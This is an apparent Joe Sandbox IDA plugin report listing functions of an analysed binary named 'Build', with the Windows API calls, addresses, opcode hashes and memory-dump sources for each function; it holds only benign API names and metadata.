                                                                                          • Instruction ID: 39e948fdb3d5c90a30ffaaf3058ccffee59b5c136feea81ada206e788e0dbeff
                                                                                          • Opcode Fuzzy Hash: dafbfe446def65c4e1631da2c599340c32d9b2156c44ce23467515ac90f92003
                                                                                          • Instruction Fuzzy Hash: 5E2106B1E407159BDB2AFFB4CC4565A76ACBB04314F45417AE909EF281E7B49900C798
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0038D348
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc
                                                                                          • String ID:
                                                                                          • API String ID: 190572456-0
                                                                                          • Opcode ID: f99ca826e64a6f1d4116e7f1c0a44608a7336bd038ef9ecea5afdb0dde1210c5
                                                                                          • Instruction ID: faf4e90bc3c7c1e0b748743aec83988272e1e107b94b1685d971f02e7a3a3f9d
                                                                                          • Opcode Fuzzy Hash: f99ca826e64a6f1d4116e7f1c0a44608a7336bd038ef9ecea5afdb0dde1210c5
                                                                                          • Instruction Fuzzy Hash: 9911CD3B6007259B9F27BE2DEC4095B7399AB8536071742A0FD15AB294DB71DC0187D2
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3
                                                                                          • String ID:
                                                                                          • API String ID: 431132790-0
                                                                                          • Opcode ID: 1eb4b2487efedf4bb971545da0ca5a17e9dba3097042e53f986b7d1987919833
                                                                                          • Instruction ID: 09d0291bca27733427676031488588d338615691d004eb67ae3eff14dd3a2404
                                                                                          • Opcode Fuzzy Hash: 1eb4b2487efedf4bb971545da0ca5a17e9dba3097042e53f986b7d1987919833
                                                                                          • Instruction Fuzzy Hash: B0018836D00A295BCF27EF64C892DAE7375AF45740B05C519FD11BF245DB358C018B91
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00386A24,?,0000015D,?,?,?,?,00387F00,000000FF,00000000,?,?), ref: 0038BCC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 2c69e23c3df070b5b9c2fe442cfa2bc065e03650a2f424f1d834cfe0095a267c
                                                                                          • Instruction ID: aec115e4850156f639eedd612b49f1b9b8ffd7974e45736aca8b3683f272cb5e
                                                                                          • Opcode Fuzzy Hash: 2c69e23c3df070b5b9c2fe442cfa2bc065e03650a2f424f1d834cfe0095a267c
                                                                                          • Instruction Fuzzy Hash: A6E06D3524172397EB3337659C12B5BFE6C9F517A0F1A01A2AC06AA5A2CF65DC0183E5
                                                                                          APIs
                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,0036AF75,92C77967,00000000,0039517A,000000FF,?,00368882,?,?), ref: 0036AFEB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ChangeCloseFindNotification
                                                                                          • String ID:
                                                                                          • API String ID: 2591292051-0
                                                                                          • Opcode ID: f92d1982c5f9e864dec80611fc94b673afdd7ff0fee22f3ca7e8c8344ca2e9d5
                                                                                          • Instruction ID: 14f9b1ee7bcedfa525f3428fd60b914ffed12f07e10ad807a2a01b88ea6ccb9c
                                                                                          • Opcode Fuzzy Hash: f92d1982c5f9e864dec80611fc94b673afdd7ff0fee22f3ca7e8c8344ca2e9d5
                                                                                          • Instruction Fuzzy Hash: B5F0E970086B028FDB328B20C848793B7E4AB12325F049B1EC0F3475E4D36165CDDA52
                                                                                          APIs
                                                                                            • Part of subcall function 0036C4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?,00000000), ref: 0036C4E6
                                                                                            • Part of subcall function 0036C4A8: FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?), ref: 0036C516
                                                                                            • Part of subcall function 0036C4A8: GetLastError.KERNEL32(?,?,00000800,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?,00000000,0000003A), ref: 0036C522
                                                                                          • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,003687BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0036C3A5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$FileFirst$CloseErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 1464966427-0
                                                                                          • Opcode ID: 03d08bb11915febf976adacdbe6493ca3611551ffe070a9b9cf4b67c87e4b33c
                                                                                          • Instruction ID: 4857c02aa2cc583264d2d6f6d5e21756bb76e9dd5b25b68338df12c8b1f4939a
                                                                                          • Opcode Fuzzy Hash: 03d08bb11915febf976adacdbe6493ca3611551ffe070a9b9cf4b67c87e4b33c
                                                                                          • Instruction Fuzzy Hash: 26F0E239008380AACA232BB448017D6BB905F26332F10DA0AF1FD5629AC6B52084CB32
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 176396367-0
                                                                                          • Opcode ID: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
                                                                                          • Instruction ID: 02716d9b525a00c568ad1eaf2b91eb5e21fcfc54c6ed66b85275d423dbb10c54
                                                                                          • Opcode Fuzzy Hash: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
                                                                                          • Instruction Fuzzy Hash: 65E0483210014059D332AB1DD845DBFA7B99FC1720F15C41DF5988B181CB799881CB60
                                                                                          APIs
                                                                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 00372F19
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExecutionStateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2211380416-0
                                                                                          • Opcode ID: 06158af07c9537c4f0ae377553083fcc00b0027491f1590be45d7e3e981cc887
                                                                                          • Instruction ID: 72e39cab70acdd44d9967f97268d5b612863901fa2158b1bee48fccf280d5098
                                                                                          • Opcode Fuzzy Hash: 06158af07c9537c4f0ae377553083fcc00b0027491f1590be45d7e3e981cc887
                                                                                          • Instruction Fuzzy Hash: 17D05B1174915155D637773568467FE191A9FC3315F498076F00D6F1C3CB9E0C4292E2
                                                                                          APIs
                                                                                          • GdipAlloc.GDIPLUS(00000010), ref: 0037C5BC
                                                                                            • Part of subcall function 0037C34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0037C36E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                          • String ID:
                                                                                          • API String ID: 1915507550-0
                                                                                          • Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                                                                          • Instruction ID: 3a1e906aa3f061c1d16105cfd4b3a1774e5b7600442ab87a3eb187c3128d7aca
                                                                                          • Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                                                                          • Instruction Fuzzy Hash: 05D0A730220308B6DF532B21CC1297E7698DB01350F00C0297805D9140EEBADA50AA51
                                                                                          APIs
                                                                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 003801A4
                                                                                            • Part of subcall function 0037D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037D875
                                                                                            • Part of subcall function 0037D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037D886
                                                                                            • Part of subcall function 0037D864: IsDialogMessageW.USER32(0001048A,?), ref: 0037D89A
                                                                                            • Part of subcall function 0037D864: TranslateMessage.USER32(?), ref: 0037D8A8
                                                                                            • Part of subcall function 0037D864: DispatchMessageW.USER32(?), ref: 0037D8B2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 897784432-0
                                                                                          • Opcode ID: 163f49bb2db22dfb1f79436f7a589d0ea4a97a73b00377f03c9c015cac320f35
                                                                                          • Instruction ID: 7d747897494c5e31af837747be24edc5fc70816291a7d18fb830f548267585c1
                                                                                          • Opcode Fuzzy Hash: 163f49bb2db22dfb1f79436f7a589d0ea4a97a73b00377f03c9c015cac320f35
                                                                                          • Instruction Fuzzy Hash: EFD09E31158300BAD6132B52CD06F1A7AA6BB9DB09F404554B288740F286629D21AB16
                                                                                          APIs
                                                                                          • DloadProtectSection.DELAYIMP ref: 00380AC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: DloadProtectSection
                                                                                          • String ID:
                                                                                          • API String ID: 2203082970-0
                                                                                          • Opcode ID: af10bab218caecbc90520e11e262a4ac6612b9041c565f3eeefafdd2aeca39ab
                                                                                          • Instruction ID: 638f1ec6958c36609ddb4e2ffc059bc77803888d910444d86a5b9a1975df2c94
                                                                                          • Opcode Fuzzy Hash: af10bab218caecbc90520e11e262a4ac6612b9041c565f3eeefafdd2aeca39ab
                                                                                          • Instruction Fuzzy Hash: CED0C970501B049DD29FBB689C8EB6422A8B319708F950485B506DA094C7A5BCC88705
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: 3dd1aef9214c3e682463583cad30b66182c8b9e63c76bf8652036d19c77b5f4b
                                                                                          • Instruction ID: 67425673890de973854f591529cf301a58249be73a568216418e2c96abd8e2e2
                                                                                          • Opcode Fuzzy Hash: 3dd1aef9214c3e682463583cad30b66182c8b9e63c76bf8652036d19c77b5f4b
                                                                                          • Instruction Fuzzy Hash: 5ED0C971415211CFD3718F38E404741BBE4AF08310B11882ED0C9C2220E6755880CF40
                                                                                          APIs
                                                                                          • GetFileType.KERNELBASE(000000FF,0036B18A,?,?,?,00000000,0036B662,?,?,00000000,?,?), ref: 0036B294
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileType
                                                                                          • String ID:
                                                                                          • API String ID: 3081899298-0
                                                                                          • Opcode ID: 583da34a9ccc0e1218348285efa8f93accccc1a50433072bfc2c808c1dcdf3ce
                                                                                          • Instruction ID: 91f1d6877fd79fa05cd884e5a32110f1f8e32ec74789fe7703c12f9de42bd5c1
                                                                                          • Opcode Fuzzy Hash: 583da34a9ccc0e1218348285efa8f93accccc1a50433072bfc2c808c1dcdf3ce
                                                                                          • Instruction Fuzzy Hash: 90C0123400010495CE325624985545CB351AE523667B5CA94C028C50A9C3238CC7EE00
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 60270f70d8e7dfa616ce20955f6c2f0001bd27ef5c3efd42a04d6fe3b0d19d27
                                                                                          • Instruction ID: 1940b80a718a9d43aeb14da7291f3e8f090599857b66191c19e27eee8212a3d0
                                                                                          • Opcode Fuzzy Hash: 60270f70d8e7dfa616ce20955f6c2f0001bd27ef5c3efd42a04d6fe3b0d19d27
                                                                                          • Instruction Fuzzy Hash: 6DB0128A35C202BD325F31545C02C3F010CD0C0B10332857EF404C4040B4445C4C0631
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: d165c1381d0a63b369b3c7c9f6c9e170d5e1041c9a241bde47cac97c4ba141db
                                                                                          • Instruction ID: ab271be2d57119927ad921678f5267a0ec93a8d770cef3dc357177cf581e23cb
                                                                                          • Opcode Fuzzy Hash: d165c1381d0a63b369b3c7c9f6c9e170d5e1041c9a241bde47cac97c4ba141db
                                                                                          • Instruction Fuzzy Hash: 41B09289258302AC369B61595C42D3B011CC0C0B10321856AF408C4140A4405C884631
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: f3539d9da7c431c45051ba5cda2f386be0a931b305d0bac3ae0d39dffcfea562
                                                                                          • Instruction ID: 5f5be77476aaa0d7f5bc005d97448e49dd6cba3543ccf9a839bcae087d602878
                                                                                          • Opcode Fuzzy Hash: f3539d9da7c431c45051ba5cda2f386be0a931b305d0bac3ae0d39dffcfea562
                                                                                          • Instruction Fuzzy Hash: EBB0128D35C302AC329F71585C42D3F010CC0C0B10331C47EF808C4140F4406C4C0731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
